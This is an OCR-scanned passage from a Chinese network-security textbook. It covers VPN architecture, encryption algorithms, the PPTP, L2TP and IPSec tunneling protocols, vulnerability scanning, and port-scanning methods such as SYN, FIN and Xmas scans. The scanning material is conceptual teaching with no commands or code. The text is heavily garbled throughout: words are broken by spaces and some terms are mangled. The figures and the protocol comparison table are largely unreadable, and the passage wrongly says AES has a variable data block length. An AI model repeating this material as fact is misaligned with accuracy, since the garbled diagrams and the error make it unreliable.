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VPN 和 一 般 的 网 络 连接 一 样 由 三 个 部 分 组 成 : 客户 机 、 传 输 介质 和 服务 器 。 不 同 的 
是 VPN 的 连接 不 是 采用 物理 的 传输 介质 ， 而 是 使 用 称 之 为 “隧道 ”的 技术 作为 传输 介 
质 。 这 个 隧道 是 建立 在 公共 网 络 或 专用 网 络 基础 之 上 的 。VPN 连接 的 示意 图 如 图 3-61 
所 示 。 

要 实现 VPN 连接 , 企业 内 部 网 络 中 必须 配置 有 一 台 VPN 服务 器 ，VPN 服务 器 一 方 
面 连接 企业 内 部 专用 网 络 ， 另 一 方面 要 连接 到 Intemet， 也 就 是 说 VPN 服务 器 必须 拥有 
一 个 公用 的 下 地址 。 当 客户 机 通过 VPN 连接 与 专用 网 络 中 的 计算 机 进行 通信 时 ， 先 由 
ISP 将 所 有 的 数据 传送 到 VPN 服务 器 ， 然 后 再 由 VPN 服务 器 负责 将 所 有 的 数据 传送 到 


目标 计算 机 。 
里 
使 用 PPTP 或 ISP 的 PPP 使 用 PPTP 或 L2TP 企业 专用 
L2TP 的 VPN 连接 服务 器 的 VPN 服务 器 网 络 


图 3-61 VPN 的 连接 示意 图 


3.4.3.2 VPN 的 数据 加 密 技术 

VPN 架构 中 采用 了 多 种 安全 机 制 ， 如 隧道 技术 (Tunneling )、 加 解密 技术 
(Encryption)、 密 钥 管 理 技术 、 身 份 认 证 技术 (Authentication) 等 。 通 过 上 述 的 各 项 网 络 
安全 技术 ， 确 保 资料 在 公众 网 络 中 传输 时 不 被 窃取 ， 或 是 即使 被 窃取 了 ， 对 方 亦 无 法 读 
取 数 据 包 内 所 传送 的 资料 。 

数据 加 密 的 基本 思想 是 通过 变换 信息 的 表示 形式 来 伪装 需要 保护 的 敏感 信息 ， 使 非 
受权 者 不 能 了 解 被 保护 信息 的 内 容 。 

VPN 可 以 通过 ISAKMP/IKE/Oakley 协商 确定 可 选 的 数据 加 密 算法 ， 其 中 包括 DES 
(数据 加 密 标准 )，3DES (三 重 数据 加 密 标准 ) 和 AES 高 级 加 密 标准 ) 等 。 

DES 是 20 世纪 70 年 代 开发 出 来 的 ， 当 时 被 认为 是 比较 安全 的 , 但 是 现在 的 个 人 计 
算 机 很 容易 破解 该 密码 。 该 密码 用 56 位 的 密 钥 对 64 位 的 数据 块 进行 加 密 。 当 被 加 密 数 
据 大 于 64 位 时 ， 需 要 把 被 加 密 的 数据 分 割 成 多 个 64 位 的 数据 块 ， 当 被 加 密 数 据 不 足 64 
位 时 ， 需 要 把 它 填充 到 64 位 。 为 了 增强 安全 性 ， 一 般 使 用 3DES。 

3DES 是 以 DES 为 基础 ， 进 行 3 次 DES 加 密 操 作 ， 加 密 的 数据 块 长 度 仍然 是 64 比 
特 位 ， 其 密码 长 度 为 112 比特 位 。 
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AES 是 DES 的 替代 标准 ， 其 密码 长 度 和 加 密 数 据 长 度 都 是 可 以 变化 的 ， 其 变化 范 
围 为 128、192 和 256 比特 位 。 

为 了 加 快 加 密 速 度 ， 可 以 使 用 序列 密码 算法 ， 如 RC4 等 。 

在 具体 的 密 钥 交换 中 ， 可 以 采用 Diffie-Hellman 算法 、RSA、ECC 算法 等 。 
3.4.3.3 ”隧道 协议 

三 种 最 常见 的 也 是 最 为 广泛 实现 的 隧道 技术 是 : 点 对 点 隧道 协议 (PPTP， 
Point-toPointTunnelingProtocol)， 第 2 层 隧道 协议 (L2TP, Layer2TunnelingProtocol), IP 
安全 协议 (IPSec )。 除 了 这 三 种 技术 以 外 还 有 通用 路 由 封装 (GRE, 
GenericRouteEncapsulation)、L2F 以 及 SOCK 协议 等 。 

1. 点 对 点 隧道 协议 (PPTP) 

由 3Com 公司 和 Microsoft 公司 合作 开发 的 PPTP 是 第 一 个 广泛 使 用 建立 VPN 的 协 
议 。 主 流 操作 系统 支持 PPTP， 如 Windows, Linux, Solaris 等 。 

PPTP 可 以 将 其 他 类 型 协议 的 数据 包 提 取出 来 , 然后 封装 在 一 个 PPTP 包 中 ,这 样 就 
可 以 支持 从 客户 机 到 VPN 网 络 服务 器 (例如 移动 用 户 到 公司 总 部 LAN) 和 LAN-to-LAN 
(例如 分 支 机 构 、 合 作 伙 伴 到 总 部 VPN 网 络 服务 器 ) 两 种 隧道 。 为 了 确保 数据 的 安全 性 ， 
通常 需要 事先 对 封装 的 数据 进行 加 密 。 

PPP (PointtoPointProtocol， 点 对 点 通信 协议 ) 已 作为 工业 标准 的 作用 ， 由 于 PPP 的 
灵活 性 ， 该 协议 在 拨号 网 络 中 早已 得 到 广泛 应 用 。 

当 与 远程 计算 机 连接 时 ，PPP 需要 与 远程 计算 机 一 起 按 以 下 步骤 协商 完成 工作 : 

@ 在 远程 计算 机 和 服务 器 之 间 建 立 帧 传输 规则 ， 通 过 该 规则 的 建立 ， 才 允许 进行 
连续 的 通信 (通常 称 为 “ 帧 传输 ”)。 

© 远程 访问 服务 器 通过 使 用 PPP 协议 中 的 身份 验证 协议 (如 : MS-CHAP、EAP、 
CHAP、SPAP、PAP 等 )， 来 验证 远程 用 户 的 身份 。 具体 调 用 哪个 验证 协议 ， 取 决 于 远程 
客户 机 和 服务 器 的 安全 配置 。 

© 身份 验证 完毕 后 ， 如 果 用 户 启 用 了 回 拨 ， 则 远程 访问 服务 器 将 挂 断 并 呼叫 远程 
访问 客户 机 ， 实 现 服务 器 回 拨 。 

@ 网 络 控制 协议 CNCP) 启用 并 配置 远程 客户 机 ， 使 得 所 用 的 LAN 协议 与 服务 器 
端 进行 PPP 通信 连接 。 

PPTP 协议 是 PPP 协议 的 扩展 , 主要 增强 了 PPP 协议 的 认证 、 压 缩 和 加 密 功 能 。 PPP 
协议 和 PPTP 协议 的 格式 如 图 3-62 所 示 。PPTP 协议 将 控制 包 与 数据 包 分 开 ， 控 制 包 采 
用 TCP 控制 ， 用 于 严格 的 状态 查询 以 及 信 令 信息 ; 数据 包 部 分 先 封装 在 PPP 协议 中 ， 
然后 封装 到 GRE 协议 中 , 用 于 在 标准 他 包 中 封装 任何 形式 的 数据 包 。 PPTP 协议 的 工作 
过 程 如 下 : 先 由 客户 通过 PPP 协议 拨号 连接 到 ISP， 然 后 通过 PPTP 协议 在 客户 端 与 目 
的 VPN 网 络 服务 器 之 间 开 通 一 个 专用 VPN 隧道 ， 把 客户 的 数据 传输 过 去 。 

PPTP 继承 了 PPP 的 认证 和 加 密 机 制 ， 包 括 PAP、CHAP、MS-CHAP 身份 验证 机 制 
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以 及 MPPE (MicrosoftPointtoPointEncrypt， 微 软 点 对 点 加 密 ) 机 制 。PPTP 协议 可 以 用 于 
移动 办 公 或 个 人 用 户 与 VPN 服务 器 网 络 进行 连接 。 同 时 ，PPTP 协议 也 适用 于 企业 网 络 
之 间 所 要 进行 的 LAN-to-LAN 类 型 VPN 连接 。 


PPP iyi 


PPP 加 密 的 PPP 有 效 负载 

报头 CIP 数据 报 ，IPX 数据 报 ) 
IP GRE PPP 加 密 的 PPP 有 效 负载 
报头 报头 报头 CIP 数据 报 ，IPX 数据 报 ) 


图 3-62 PPTP 协议 的 封装 


2. 第 2 层 隧 道 协议 CL2TP) 

L2TP 也 是 PPP 协议 的 扩展 ， 它 综合 了 PPTP 和 L2F 两 个 隧道 协议 的 优点 。L2TP 协 
议 是 由 因特网 工程 任务 组 (IETF) 管理 的 ， 是 由 Cisco, Microsoft, Ascend, 3Com 和 其 
他 网 络 设备 供应 商 在 修改 了 十 几 个 版 本 后 联合 开发 并 认可 的 ， 并 于 1999 年 8 月 公布 了 
L2TP 的 标准 RFC2661.L2TP 支持 Client-to-LAN 类 型 的 VPN 连接 ,也 支持 LAN-to-LAN 
类 型 的 VPN 连接 。 

L2TP 主要 由 LAC (L2TPAccessConcentrator) 和 LNS (L2TPNetworkServer) 构成 。 
LAC 支持 客户 端的 L2TP, 发 起 呼叫 , 接收 呼叫 和 建立 隧道 ; 而 LNS 是 所 有 隧道 的 终点 。 
在 传统 的 PPP 连接 中 , 用 户 拨号 连接 的 终点 是 LAC, 而 L2TP 能 把 PPP 协议 的 终点 延伸 
到 LNS。 

L2TP 协议 的 主要 服务 是 “封装 ”和 “加 密 ”， 其 协议 结构 如 图 3-63 所 示 。 


PPP 帧 


PPP 加 密 的 PPP 有 效 负载 
报头 CP 数据 报 ，IPX 数据 报 ) 
UDP L2TP PPP 加 密 的 PPP 有 效 负载 
报头 报头 报头 CP 数据 报 ，IPX 数据 报 ) 


图 3-63 L2TP 协议 的 封装 


基于 L2TP 协议 下 的 “加 密 ” 是 通过 使 用 在 IPSec 身份 验证 过 程 中 生成 的 密 钥 ， 使 
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用 IPSec 加 密 机 制 加 密 L2TP 消息 。 

PPTP 和 L2TP 都 使 用 PPP 协议 对 数据 进行 封装 ， 然 后 添加 附加 包头 用 于 数据 在 互 
联网 络 上 的 传输 。 尽 管 两 个 协议 非常 相似 ， 但 是 仍 存在 以 下 几 方 面 的 不 同 : 

@ PPTP 要 求 互 联网 络 为 IP 网 络 。L2TP 只 要 求 隧道 媒介 提供 面向 数据 包 的 点 对 点 
的 连接 。L2TP 可 以 在 人 P( 使 用 UDP), 帧 中 继 永久 虚拟 电路 (PVCs), X.25 虚拟 电路 (VC) 
或 ATMVC 网 络 上 使 用 。 

@ PPTP 只 能 在 两 端点 间 建 立 单一 隧道 。L2TP 支持 在 两 端点 间 使 用 多 隧道 。 使 用 
L2TP， 用 户 可 以 针对 不 同 的 服务 质量 创建 不 同 的 隧道 。 

®© L2TP 可 以 提供 包头 压缩 。 当 压缩 包头 时 ， 系 统 开销 (overhead) 占用 4 个 字 节 ， 
而 PPTP 协议 下 要 占用 6 个 字 节 。 

@ L2TP 可 以 提供 隧道 验证 ， 而 PPTP 则 不 支持 隧道 验证 。 

3. IP 安全 协议 (IPSec) 

安全 的 远程 访问 须 由 第 2 层 障 道 协议 (L2TP) 和 网 络 层 安 全 协议 (IPSec) 结合 一 
起 实现 。 这 二 者 彼此 分 工 协作 ，L2TP 协议 专用 来 建立 数据 传输 的 隧道 ， 而 IPSec 协议 则 
专用 来 保护 数据 ， 为 数据 传输 提供 安全 加 密 措施 。 

IPSec 是 一 个 标准 的 第 三 层 安 全 协议 ， 是 一 个 协议 包 。IPSec 是 IETF 于 1998 年 11 
月 公布 的 IP 安全 标准 。 它 工作 在 七 层 OSI 协议 中 的 网 络 层 ， 用 于 保护 卫 数据 包 ， 它 可 
以 定义 哪些 数据 流 需要 保护 ， 怎 样 保护 以 及 应 该 将 这 些 受 保护 的 数据 流转 发 给 谁 。 由 于 
它 工作 在 网 络 层 , 因此 可 以 用 于 两 台 主机 之 间 、 网 络 安 全 网 关 之 间 (如 防火 墙 、 路 由 器 )， 
或 主机 与 网 关 之 间 。 其 目标 是 为 IPv4 和 IPv6 提供 具有 较 强 的 互 操作 能 力 、 高 质量 和 基 
于 密码 的 安全 。 

目前 ，IPSec 有 两 种 版 本 ， 一 种 是 基于 IPv4 协议 的 ， 另 一 种 是 基于 IPv6 协议 的 , 但 
IPSec 对 于 IPv4 是 可 选 的 ， 对 于 IPv6 是 强制 性 的 。 

IPSec 在 IP 层 上 对 数据 包 进行 高 强度 的 安全 处 理 ， 提 供 数据 源 验证 、 无 连接 数据 完 
整 性 、 数 据 机 密 性 、 抗 重播 和 有 限 业 务 流 的 机 密 性 等 安全 服务 。 各 种 应 用 程序 可 以 享用 
IP 层 提供 的 安全 服务 和 密 钥 管理 ， 而 不 必 设 计 和 实现 自己 的 安全 机 制 ， 因 此 减少 密 钥 协 
商 的 开销 ， 也 降低 了 产生 安全 漏洞 的 可 能 性 。IPSec 可 连续 或 递归 应 用 ， 在 路 由 器 、 防 
火 墙 、 主 机 和 通信 和 链 路 上 配置 ， 实 现 端 到 端 安 全 、 虚 拟 专用 网 络 (VPN) 和 安全 隧道 
技术 。 

IPSec 的 工作 主要 有 数据 验证 (Authentication )、 数 据 完整 (Integrity) 和 信任 
(CConfidentiality)。 数 据 验 证 主要 确保 接收 的 数据 与 发 出 的 数据 相同 ， 并 且 确 保 发 送 数据 
者 的 真实 性 ， 数 据 完整 主要 确保 数据 在 传输 过 程 中 没有 被 算 改 ; 信任 主要 确认 通信 双方 
的 相互 信任 关系 ， 确 保 冒 名 者 的 通信 ， 通 常 使 用 Encryption (加密) 来 确立 信任 。IPSec 
包含 内 容 可 分 开 使 用 ， 也 可 合并 使 用 ， 视 具体 方案 而 定 。 目 前 IPSec 协议 可 以 采用 两 种 
方法 来 对 数据 提供 加 密 和 认证 : ESP (EncapsulatingSecurityPayload ) 协议 和 AH 
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(AuthenticationHeader) 协议 。 

AH 可 以 提供 数据 源 认证 (确保 接收 到 的 数据 是 来 自发 送 方 )、 数 据 完整 性 (确保 数 
据 没有 被 更 改 ) 以 及 防 中 继 保护 〈 确 保 数据 到 达 次 序 的 完整 性 )， 使 用 HMAC-MD-5 和 
HMAC-SHA-1 等 算法 。 而 ESP 支持 数据 的 保密 性 ， 使 用 DES、Triple-DES、RC5、RC4、 
IDEA #I BLOWFISH 等 算法 。AH 的 认证 范围 如 图 3-64 所 示 。 


IPv4 | IPL] TCP 数据 
IPv6 | JR IP k| 扩展 头 | TCP 数据 


(a) 应 用 AH 之 前 


一 -一 除 可 变 域外 的 认证 一 “一 

IPv4 [mP TAH] TCP | 数据 

除 可 变 域外 的 认证 
IPv6 [Ji IP 头 | 跳 ,目的 地 址 , 路 由 , 分 段 “|AH| 目 的 地 址 | TCP | 数据 


(b) 传输 模式 
除 新 IP 头 中 可 变 域 外 认证 
IPv4 | 新 全 头 | AH |i IP k| TCP | 数据 
除 新 IP 头 中 可 变 域外 认 订 
IPv6 | 新 IP 头 | 扩展 头 AH] bit IP k 扩展 头 | TCP | 数据 


(c) 隧道 模式 


图 3-64 AH 认证 范围 


ESP 的 加 密 和 认证 范围 如 图 3-65 所 示 。 

AH 和 ESP 均 支 持 两 种 模式 ， 传输 模式 和 隧道 模式 。 

传输 模式 主要 是 为 上 层 协议 提供 保护 ， 同 时 增加 了 IP 包 载荷 的 保护 。 例 如 ，TCP 
Brak UDP Ét, ICMP 包 均 是 在 主机 协议 栈 的 IP 层 进行 操作 。 典 型 地 ， 传 输 模式 用 于 在 
两 台 主机 〈 如 服务 器 与 工作 站 之 间 、 两 个 工作 站 之 间 ) 进行 的 端 到 端 通信 。 当 一 个 主机 
在 IPv4 上 运行 AH 或 ESP 时 ， 其 载荷 是 跟 在 IP 报头 后 面 的 数据 ， 对 IPv6 而 言 ， 其 载荷 
是 跟 在 IP 报头 后 面 的 数据 和 IPv6 的 任何 扩展 头 。 

传输 模式 的 ESP 可 以 加 密 和 认证 (可 选 ) 他 载荷 , 但 不 包括 全 头 。 传 输 模式 的 AH 
可 以 认证 下 载荷 和 下 头 的 选中 部 分 。 

隧道 模式 对 整个 全 包 提 供 保护 。 为 了 达到 这 个 目的 , “4 IP fn AH 或 ESP 域 之 后 ， 
整个 数据 包 加 安全 域 被 当 作 一 个 新 人 P 包 的 载荷 ， 并 拥有 一 个 新 的 外 部 IP 包头 。 原 来 或 
内 部 的 整个 包 利 用 隧道 在 网 络 之 间 传 输 , 沿途 路 由 器 不 能 检查 内 部 IP 包头 。 由 于 原来 的 
包 被 封装 ， 新 的 、 更 大 的 包 可 以 拥有 完全 不 同 的 源 地 址 与 目的 地 址 ， 以 增强 安全 性 。 当 
SA 的 一 端 或 两 端 为 安全 网 关 时 使 用 隧道 模式 , 如 使 用 IPSec 的 防火 墙 或 路 由 器 。 防火 墙 
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外 的 主机 在 没有 IPSec 时 也 可 以 实现 安全 通信 。 而 当主 机 生成 的 未 保护 包 通 过 本 地 网 络 
边缘 的 防火 墙 或 安全 路 由 器 时 ，IPSec 提供 隧道 模式 的 安全 性 。 


认证 
WME: 
原 IP [ESP ESP | ESP 
Iesi s |a| T 数据 |æ | 认证 
一 认证 - 
mE 
原 F BLEK [ESP [目的 ESP | ESP 
IPv6 | y | 地 址 路 由 .分 段 | 头 | 地 址 | TCP | sae | | 认证 
(a) 传输 模式 
认证 
加 密 
新 IP|ESP| 原 IP E ESP 
IPv4 | E E A Sl TOP 数据 | 尾 | 认证 
ESP 
Pyg 认证 


(b) 隧道 模式 


图 3-65 ESP 加 密 和 认证 范围 


3.4.3.4 ”三 种 协议 的 比较 
关于 点 对 点 隧道 协议 (PPTP), 第 2 层 隧道 协议 (L2TP) Al IP 安全 协议 的 比较 如 表 


表 3-10 三 种 主要 VPN 隧道 协议 比较 


协议 选择 IPSec 
网 络 模式 主机 对 主机 的 对 等 模式 
Intranet, Extranet 和 通过 
使 用 方式 “| 通过 隧道 进行 远程 操作 隧道 
进行 远程 操作 
OSI 层 网 络 层 
上 层 协议 支持 | IP. PX% IP, PX 等 IP 
无 标准 (通常 与 PSec 一 起 组 建 
安全 加 密 MPPE 加 密 技术 VEN, 所 采用 的 加 密 技术 也 是 由 | pEs 和 3DES 


IPSec 协议 提供 的 ， 参 考 IPSec 
的 加 密 技 术 ) 


H: p 
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协议 选择 PPTP L2TP IPSec 
采用 PPP 协议 中 的 | 无 标准 (通常 与 IPSec 一 起 组 建 
CHAP、MS-CHAP、| VPN, 所 采用 的 用 户 身份 验证 技 
用 户 认证 MS-CHAPv2 术 也 是 由 IPSec ln 参 | AH 
等 验证 方法 考 IPSec 的 用 户 认证 技术 ) 
包 认 证 需 特殊 解决 无 标准 ESP 
包 加 密 无 标准 无 标准 ISAKMP/Oakley, SKIP 
密 钥 管理 无 标准 无 标准 IKM 
单个 点 对 点 隧道 , 不 | 单个 点 对 点 隧道 , 不 能 同时 访问 | 多 点 隧道 , 同时 访问 VPN 
隧道 服务 能 同时 访问 公用 网 “| 公用 网 和 公用 网 


3.4.3.5 VPN 的 配置 和 应 用 

VPN 网 关 是 可 信任 专用 网 和 不 可 信任 专 网 的 明显 分 界线 ， 这 些 设备 位 于 内 联网 和 
Internet 的 边界 处 ， 它 们 充当 在 专 网 内 进行 可 靠 传输 的 隧道 的 端点 。 

-个 VPN 网 关 要 扮演 两 个 角色 。 第 一 ，VPN 网 关 保证 希望 进行 的 通信 安全 地 进入 

和 离开 专 网 。 第 二 ，VPN 网 关 可 以 拒绝 不 希望 进行 的 通信 ， 使 之 不 能 进入 它 所 保护 的 
专 网 。 

假设 一 个 公司 有 三 个 内 联网 站 点 。 一 个 站 点 位 于 上 海 的 公司 总 部 ， 其 他 两 个 分 别 位 
于 北京 和 深圳 。 必 须 在 这 三 个 站 点 之 间 建 立 一 个 站 点 到 站 点 的 VPN。 具 体 的 配置 和 应 用 
更 具体 的 产品 有 关 ， 这 里 从 略 。 

熟练 配置 和 应 用 iPig 和 OpenVPN， 详 情 参见 www.iopus.com/ipig/#ll OpenVPN.net. 


3.4.4 ”安全 扫描 和 风险 评估 


安全 扫描 可 以 提前 发 现 系 统 和 网 络 的 脆弱 性 ， 也 是 风险 评估 的 前 提 。 
3.4.4.1 ”安全 扫描 概述 

在 Intemet 安全 领域 ， 扫 描 器 是 最 有 效 的 安全 检测 工具 之 一 。 扫 描 器 是 一 种 自动 检 
测 远程 或 本 地 主机 、 网 络 系统 安全 性 弱点 的 程序 。 通 过 使 用 扫描 器 可 以 发 现 远程 服务 器 
是 否 存活 、 它 对 外 开放 的 各 种 TCP 端口 的 分 配 及 提供 的 服务 、 它 所 使 用 的 软件 版 本 (如 
操作 系统 或 其 他 应 用 软件 的 版 本 )、 所 存在 可 能 被 利用 的 系统 漏洞 。 
3.4.4.2 ”漏洞 扫描 

漏洞 是 在 硬件 、 软 件 、 协 议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ， 从 而 可 以 使 
攻击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 

字典 中 对 “安全 漏洞 ”的 解释 为 : 安全 漏洞 即 任何 会 引起 系统 的 安全 性 受到 破坏 的 
事物 ， 包 括 不 恰当 的 操作 指导 、 病 毒 、 没 有 被 正确 配置 的 系统 、 弱 密码 或 者 写 在 纸 条 上 
的 密码 等 。 

在 计算 机 信息 安全 领域 所 讨论 的 安全 漏洞 的 含义 与 字典 中 的 定义 有 所 区 别 。 
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微软 安全 响应 中 心 对 安全 漏洞 的 定义 为 : 即使 使 用 者 在 合理 配置 了 产品 的 条 件 下 ， 
由 于 产品 自身 存在 的 缺陷 ， 产 品 的 运行 可 能 被 改变 以 产生 非 设 计 者 预期 的 后 果 ， 并 可 最 
终 导致 安全 性 被 破坏 的 问题 ， 包 括 使 用 者 系统 被 非法 侵占 、 数 据 被 非法 访问 并 泄露 ， 或 
系统 拒绝 服务 等 。 我 们 将 这 些 缺 陷 称 为 安全 漏洞 。 

各 种 软件 和 网 络 都 有 可 能 存在 漏洞 。 软 件 的 漏洞 有 两 类 : 一 类 是 有 意 制造 的 漏洞 ， 
另 一 类 是 无 意 制造 的 漏洞 。 

有 意 制造 的 漏洞 是 指 系统 设计 者 为 日 后 控制 系统 或 窃取 信息 而 故意 设计 的 漏洞 ， 包 
括 逻 辑 炸 弹 、 各 种 后 门 等 。 

无 意 制 造 的 漏洞 是 指 系统 设计 者 由 于 朴 忽 或 其 他 技术 原因 而 留 下 的 漏洞 。 例 如 使 用 
C 语言 的 字符 串 复制 函数 ， 因 未 做 合法 性 检查 而 导致 缓冲 区 溢出 。 最 重要 的 软件 如 操作 
系统 、 数 据 库 、 通 信 协 议 、 网 络 服务 软件 等 都 有 安全 漏洞 。 每 年 都 有 数 以 千 计 的 网 络 安 
全 漏洞 被 发 现 和 公布 ， 加 上 攻击 者 手段 的 不 断 变 化 ， 网 络 安全 状况 也 在 随 着 安全 漏洞 的 
增加 变 得 日 益 严峻 。 据 CERT/CC 统计 ， 该 组 织 仅 2007 年 收 到 的 信息 系统 安全 漏洞 报告 
就 达 7236 个 。 同 时 ，2007 年 微软 公司 正式 公布 了 69 个 具有 编号 的 安全 漏洞 。 其 中 ， 除 
Windows 操作 系统 漏洞 外 ， 安 全 漏洞 更 多 的 集中 出 现在 了 IE 浏览 器 和 MSOffice 等 应 用 
软件 上 。 据 不 完全 统计 ， 仅 2007 年 各 大 公司 公布 的 重大 漏洞 多 达 4000 多 个 (更 新 )。 

近年 所 出 现 的 众多 病毒 、 木 马 及 其 他 破坏 性 程序 ，90% 以 上 都 是 利用 了 现 有 系统 软 
件 或 应 用 软件 的 漏洞 而 设计 出 来 的 。 

以 常见 攻击 为 例 ， 作 为 破坏 性 攻击 ， 只 需要 利用 工具 发 动 攻击 即 可 。 而 作为 入 侵 性 
攻击 ， 往 往 要 利用 收集 到 的 信息 ， 找 到 其 系统 漏洞 ， 然 后 利用 该 漏洞 获取 一 定 的 权限 。 
所 以 对 于 攻击 者 来 讲 ， 漏 洞 至 关 重 要 ， 但 是 并 不 是 所 有 的 攻击 都 需要 漏洞 。 如 有 的 攻击 
方式 是 ， 发 出 超大 量 的 服务 请 求 ， 使 攻击 的 目标 忙于 应 付 ， 而 无 法 再 接受 正常 的 服务 请 
求 。 但 是 这 种 攻击 方式 不 占 多 数 ， 因 为 大 多 数 攻击 成 功 的 范例 都 是 利用 了 被 攻击 者 的 系 
统 本 身 的 漏洞 。 造 成 软件 漏洞 的 主要 原因 在 于 编写 该 软件 的 程序 员 缺 乏 安全 意识 ， 造 成 
攻击 者 对 软件 进行 非 正常 的 调用 请 求 时 ， 造 成 缓冲 区 溢出 或 者 对 文件 的 非法 访问 。 

能 够 被 攻击 者 利用 的 漏洞 不 仅 包 括 系 统 软件 设计 上 的 安全 漏洞 ， 也 包括 由 于 管理 配 
置 不 当 而 造成 的 漏洞 。 例 如 ，WWW 服务 器 提供 商 Apache 的 主页 被 攻击 者 攻破 ， 其 主 
页 面 上 的 PoweredbyApache 图 样 被 改 成 了 PoweredbyMicrosoftBackOffice 的 图 样 ， 攻 击 
者 就 是 利用 了 管理 员 对 webserver 和 数据 库 的 一 些 不 当 配置 成 功 取得 了 最 高 权限 。 

漏洞 扫描 器 是 一 种 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 。 通 过 使 用 漏洞 扫描 
器 ， 系 统管 理 员 能 够 发 现 所 维护 的 服务 器 的 各 种 端口 的 分 配 、 提 供 的 服务 、 服 务 软件 版 
本 和 这 些 服务 及 软件 呈现 在 因特网 上 的 安全 漏洞 。 同 时 ， 漏 洞 扫 描 器 还 能 从 主机 系统 内 
部 检测 系统 配置 的 缺陷 ， 模 拟 系统 管理 员 进行 系统 内 部 审核 的 全 过 程 ， 发 现 能 够 被 黑客 
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利用 的 种 种 错误 配置 。 可 以 将 前 者 称 为 漏洞 扫描 器 的 外 部 扫描 ， 是 因为 它 是 在 实际 的 因 
特 网 环境 下 通过 网 络 对 系统 管理 员 所 维护 的 服务 器 进行 外 部 特征 扫描 。 将 后 者 称 为 漏洞 
扫描 器 的 内 部 扫描 ， 是 因为 它 是 以 系统 管理 员 的 身份 对 所 维护 的 服务 器 进行 内 部 特征 扫 
描 。 实 际 上 ， 能 够 从 主机 系统 内 部 检测 系统 配置 的 缺陷 ， 是 系统 管理 员 的 漏洞 扫描 器 与 
黑客 拥有 的 漏洞 扫描 器 在 技术 上 的 最 大 区 别 。 黑 客 在 扫描 目标 主机 漏洞 阶段 〈 即 入 侵 准 
WIBO 是 不 可 能 进行 目标 主机 系统 内 部 检测 的 。 

3.4.4.3 ”端口 扫描 

互联 网 上 通信 的 双方 不 仅 需 要 知道 对 方 的 地 址 ， 也 需要 知道 通信 程序 的 端口 号 。 在 
同一 时 间 内 ， 两 台 主 机 之 间 可 能 不 仅仅 只 有 一 种 通信 类 型 。 为 区 别 通信 的 程序 ， 在 所 有 
的 下 数据 报 文中 不 仅仅 有 源 地 址 和 目的 地 址 , 也 有 源 端 口号 与 目的 端口 号 。 而 不 同 的 网 
络 服务 会 监听 特定 的 端口 。 例 如 FTP 服务 使 用 的 端口 号 是 21， 而 DNS 服务 运行 在 53 
端口 等 。 

目前 使 用 的 IPv4 协议 支持 16 位 的 端口 ， 端 口号 可 使 用 的 范围 是 0 一 65535。 在 这 些 
端口 号 中 ， 前 1024 CO~1023) 个 端口 称 为 熟知 端口 ， 这 些 端 口 被 提供 给 特定 的 服务 使 
用 ,由 IANA(CItemetAssignedNumbersAuthority 管理。 第 二 部 分 的 端口 号 (1024 一 49151) 
叫做 注册 端口 ， 一 般 用 于 客户 端 连接 时 随机 选择 。49152 一 65535 端口 叫做 动态 端口 或 专 
用 端口 ， 提 供给 专用 应 用 程序 。 

入 侵 者 在 进行 攻击 前 ， 通 常会 先 了 解 目标 系统 的 一 些 信息 ， 如 目标 主机 运行 的 是 什 
么 操作 系统 ; 是 否 有 什么 保护 措施 ;运行 什么 服务 ; 运行 的 服务 的 版 本 ; 存在 的 漏洞 等 。 
而 判断 运行 服务 的 方法 就 是 通过 端口 扫描 ， 因 为 常用 的 服务 是 使 用 标准 的 端口 ， 只 要 扫 
描 到 相应 的 端口 ， 就 能 知道 目标 主机 上 运行 着 什么 服务 。 然 后 入 侵 者 才能 针对 这 些 服务 
进行 相应 的 攻击 。 例 如 扫描 到 目标 主机 开 着 23 端口 ， 就 可 以 利用 一 些 口 令 攻击 程序 对 
Telnet 服务 进行 口令 的 暴力 破解 。 端 口 扫 描 虽然 常常 被 攻击 者 利用 ， 但 是 也 可 用 于 主机 
的 风险 评估 。 用 户 可 以 通过 端口 扫描 ， 检 测 系统 和 网 络 存在 的 端口 和 服务 ， 然 后 关闭 不 
需要 的 服务 ， 对 开放 的 服务 增加 访问 限制 。 

端口 扫描 有 下 面 几 种 主要 方法 : 

@ TCPconnect 扫描 。 使 用 系统 提供 的 connectO 函 数 来 连接 目标 端口 ， 与 目标 系统 
完成 一 次 完整 的 三 次 握手 过 程 。 如 果 目 标 端口 正在 监听 connect0 就 成 功 返 回 ， 否 则 ， 说 
明 该 端口 不 可 访问 。 

@ TCPSYN 扫描 。 这 种 方法 也 叫 “ 半 打开 扫描 〈HalfopenScanning)”。 这 种 扫描 方 
法 并 没有 建立 完整 的 TCP 连接 。 客 户 端 首 先 向 服务 器 发 送 SYN 分 组 发 起 连接 ， 如 果 收 
到 一 个 来 自 服务 器 的 SYN/ACK 应 答 ， 那 么 可 以 推断 该 端口 处 于 监听 状态 。 如 果 收 到 一 
个 RST/ACK 分 组 则 认为 该 端口 不 在 监听 。 而 客户 端 不 管 收 到 的 是 什么 样 的 分 组 ， 都 向 
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服务 器 发 送 一 个 RST/ACK 分 组 ， 这 样 并 没有 建立 一 个 完整 的 TCP 连接 ， 但 客户 端 能 够 
知道 服务 器 某 个 端口 是 否 开 放 。 该 扫描 不 会 在 目标 系统 上 产生 日 志 。 

@ TCPFIN 扫描 。TCPFIN 扫描 是 向 目标 端口 发 送 一 个 FIN 分 组 。 按 照 RFC793 的 
规定 ,目标 端口 应 该 给 所 有 关闭 着 的 端口 发 回 一 个 RST 分 组 , 而 打开 着 的 端口 则 往往 忽 
略 这 些 请 求 。 此 方法 利用 了 TCP/IP 实现 上 的 一 个 漏洞 来 完成 扫描 ,通常 只 在 基于 UNIX 
的 TCP/IP 协议 栈 上 才 有 效 。 

@ TCPXmas 树 扫描 。 该 方法 向 目标 端口 发 送 FIN、URG 和 PUSH 分组。 按照 RFC793 
的 规定 ， 目 标 系 统 应 该 给 所 有 关闭 着 的 端口 发 送 回 一 个 RST 分 组 。 

© TCP 空 扫描 。 该 方法 关闭 掉 所 有 标志 发 送 一 个 TCP 分 组 。 按 照 RFC793 应 该 给 
所 有 关闭 着 的 端口 发 回 一 个 RST 分 组 。 

© TCPACK 扫描 。 它 可 以 用 来 判断 防火 墙 过 滤 规 则 的 设计 ， 测 试 安全 策略 的 有 
效 性 。 

@ TCPWindows 扫描 。 此 方法 可 以 检测 一 些 系 统 ( 比 如 AIX 和 FreeBSD) 上 打开 
